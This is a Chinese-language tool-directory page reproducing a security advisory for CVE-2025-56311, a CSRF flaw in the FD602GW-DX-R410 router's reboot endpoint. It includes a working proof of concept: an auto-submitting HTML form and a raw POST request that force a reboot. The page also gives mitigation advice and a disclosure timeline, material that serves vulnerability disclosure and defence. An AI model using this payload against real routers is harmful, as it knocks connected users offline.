Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-56311 — FD602GW-DX-R410路由器中的CSRF漏洞允许远程攻击者在管理员已认证的情况下,通过向/boaform/admin/formReboot发送精心构造的POST请求来重启设备。 | Kitploit
工具/GitHubGitHub/wrathfuldiety/cve-2025-56311
漏洞分析漏洞利用Web安全渗透测试论文与研究学习与教育
GitHubwrathfuldiety/cve-2025-56311

CVE-2025-56311

FD602GW-DX-R410路由器中的CSRF漏洞允许远程攻击者在管理员已认证的情况下,通过向/boaform/admin/formReboot发送精心构造的POST请求来重启设备。

查看仓库
211个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-56311:安全公告 – FD602GW-DX-R410 路由器重启功能中的 CSRF 漏洞

FD602GW-DX-R410 光纤路由器管理界面(固件版本 V2.2.14)中跨站请求伪造(CSRF)漏洞的概念验证与安全公告。本公告概述了影响、攻击向量及修复建议。

fd602gw-dx-r410-csrf-advisory

FD602GW-DX-R410 路由器中的 CSRF 漏洞允许远程攻击者在管理员已认证的情况下,通过向 /boaform/admin/formReboot 发送精心构造的 POST 请求重启设备。


概述

在 FD602GW-DX-R410 光纤路由器的基于 Web 的管理控制台(固件版本 V2.2.14)中发现了一个跨站请求伪造(CSRF)漏洞。/boaform/admin/formReboot 端点接受 POST 请求,无需 CSRF 令牌或来源验证即可触发设备完全重启。如果经过身份验证的管理员访问恶意页面,路由器可能会在未经同意的情况下被远程重启。

  • CVE ID: CVE-2025-56311
  • 公告发布日期: 2025年7月
  • 发现者: Hasanka Amarasinghe(独立安全研究员)
  • 供应商: 深圳市兆能讯通科技有限公司
  • 受影响产品: FD602GW-DX-R410 光纤路由器
  • 固件版本: V2.2.14(Build.1918.241111)
  • 硬件版本: R410.1B
  • 引导加载程序版本: V3.7-2312181457
  • Web 服务器: Boa/0.93.15
  • 攻击途径: 远程(需要已登录的认证管理员)
  • 严重性: 中
  • CVSS v3.1 基础评分: 5.4(中)

受影响产品

  • 设备: FD602GW-DX-R410 光纤路由器
  • 固件: V2.2.14(Build.1918.241111)
  • 组件: 重启处理程序 - /boaform/admin/formReboot
  • Web 服务器: Boa/0.93.15

漏洞详情

  • 类型: 跨站请求伪造(CSRF)
  • 攻击向量: 远程(管理员必须已登录其会话)
  • 身份验证: 攻击者无需身份验证(受害者浏览器中需要管理员会话)
  • 影响: 未经授权的设备重启
  • 状态持久性: 无状态会话,可能通过 IP 或内部会话令牌进行跟踪

概念验证(PoC)

CSRF 载荷(HTML)

root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Pro -->
  <body>
    <form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
      <input type="hidden" name="postSecurityFlag" value="+65535" />
      <input type="submit" value="Submit" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

HTTP 请求

root@kitploit:~
POST /boaform/admin/formReboot HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

postSecurityFlag=+65535

响应

HTTP 200 OK;路由器立即重启。


建议

  • 在所有管理端点上实施 CSRF 令牌以及严格的 Origin/Referer 验证。
  • 使过期或孤立会话失效,并将会话绑定到安全 Cookie。
  • 考虑在执行重启等破坏性操作前加入 CAPTCHA 或确认提示。
  • 将管理界面访问限制在受信任的 IP 或内部网络。

攻击向量

  • 要求路由器管理员已通过身份验证(已登录)。
  • 攻击者诱使受害者访问恶意网页,该页面静默触发对重启端点的 POST 请求。
  • 路由器接受伪造请求并立即重启,导致拒绝服务。

影响

  • 强制重启导致拒绝服务。
  • 所有连接的用户丧失网络可用性。
  • 可能与其他问题(例如会话劫持或 XSS)结合以提升影响。

披露时间线

日期行动
2025年6月发现漏洞
2025年6月尝试负责任披露(未获回复)
2025年7月向 MITRE 请求 CVE ID
2025年7月公告准备完成,等待发布
2025年9月

参考

  • 供应商:深圳市兆能讯通科技有限公司
  • 设备:FD602GW-DX-R410
  • 固件:V2.2.14
  • GitHub 公告:https://github.com/wrathfulDiety/CVE-2025-56311

免责声明

本公告仅供教育和安全意识之用。作者对滥用不承担任何责任。所有测试均在受控环境中进行。

下载工具
CVE 分配,公告公开